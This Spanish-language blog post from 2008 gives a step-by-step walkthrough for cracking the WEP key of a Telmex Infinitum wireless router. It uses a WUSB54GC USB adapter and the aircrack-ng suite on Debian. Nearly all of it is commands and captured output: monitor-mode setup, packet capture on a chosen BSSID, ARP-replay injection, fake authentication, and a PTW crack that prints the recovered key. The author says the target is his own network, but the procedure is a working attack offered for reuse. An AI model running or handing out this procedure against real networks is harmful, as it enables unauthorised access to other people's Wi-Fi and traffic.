Aqui dejo como inyectar con esta usb WUSB54GC sobre un infinitum de telmex
use debian :P y mi mini itx =)
mini:/home/neo/Desktop# uname -aLinux mini 2.6.25-2-686 #1 SMP Fri Jul 18 17:46:56 UTC 2008 i686 GNU/Linuxprimero y a que tenemos instalada la tarjeta usb tenemos que levantarla con airomon y lo hacemos 2 veces esto para crear 2 interfaces logicas virtuales o como les les llame o.O, en este caso como es mi propio 2wire no cambie la mac xD. noten que se han creado mon0 y mon1
mini:/home/neo# airmon-ng start wlan0Interface Chipset Driverwlan0 Ralink 2573 USB rt73usb - [phy0] (monitor mode enabled on mon0)mini:/home/neo# airmon-ng start wlan0Interface Chipset Driverwlan0 Ralink 2573 USB rt73usb - [phy0] (monitor mode enabled on mon1)mon0 Ralink 2573 USB rt73usb - [phy0]miren el ifconfig
luego hacemos un scan para saber que redes hay por ahi
mini:/home/neo/Desktop# iwlist wlan0 swlan0 Scan completed : Cell 01 - Address: 00:1E:C7:75:57:99 ESSID:"INFINITUM1003" Mode:Master Channel:5 Frequency:2.432 GHz (Channel 5) Quality=47/100 Signal level=-78 dBm Encryption key:on Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 6 Mb/s; 9 Mb/s 11 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s 48 Mb/s; 54 Mb/s Extra:tsf=00000000a25ca7aeen este caso esta es la red que elegi la mia o.O'
corremos airodump para comenzar a sniffear especifico que sea el canal 5 y que solo capture de un bssid en especifico -w que haga un archivo llamado hola y que use la interfaz de mon0 miren el comando
mini:/home/neo/Desktop# airodump-ng --channel 5 --bssid 00:1E:C7:75:57:99 -w hola mon0comenzamos con aireplay le digo que mande 1024 paquetes por segunto. el bssid y la mac de mi tarjeta que use las interfaces de mon0 mon1
mini:/home/neo# aireplay-ng --arpreplay -x 1024 -b 00:1E:C7:75:57:99 -h 00:21:29:65:0c:ed -i mon0 mon1le decimos aireplay que haga una autenticacion falsa -a mac ap -h tumac con mon1
mini:/home/neo# aireplay-ng -1 0 -a 00:1E:C7:75:57:99 -h 00:21:29:65:0c:ed mon100:12:40 Waiting for beacon frame (BSSID: 00:1E:C7:75:57:99) on channel 500:12:40 Sending Authentication Request (Open System)00:12:40 Authentication successful00:12:40 Sending Association Request00:12:40 Association successful :-) (AID: 1)ya capturados algunos paquetes comenzamos a crackear con aircrack -z es ptw
mini:/home/neo/Desktop# aircrack-ng -z hola-01.capOpening hola-01.capRead 125360 packets.# BSSID ESSID Encryption1 00:1E:C7:75:57:99 INFINITUM1003 WEP (61768 IVs)Choosing first network as target.Opening hola-01.capAttack will be restarted every 5000 captured ivs.Starting PTW attack with 61768 ivs. KEY FOUND! [ 10:52:47:03:89 ]Decrypted correctly: 100%y ahi saca la llave.
By
artzneo at 2008-08-03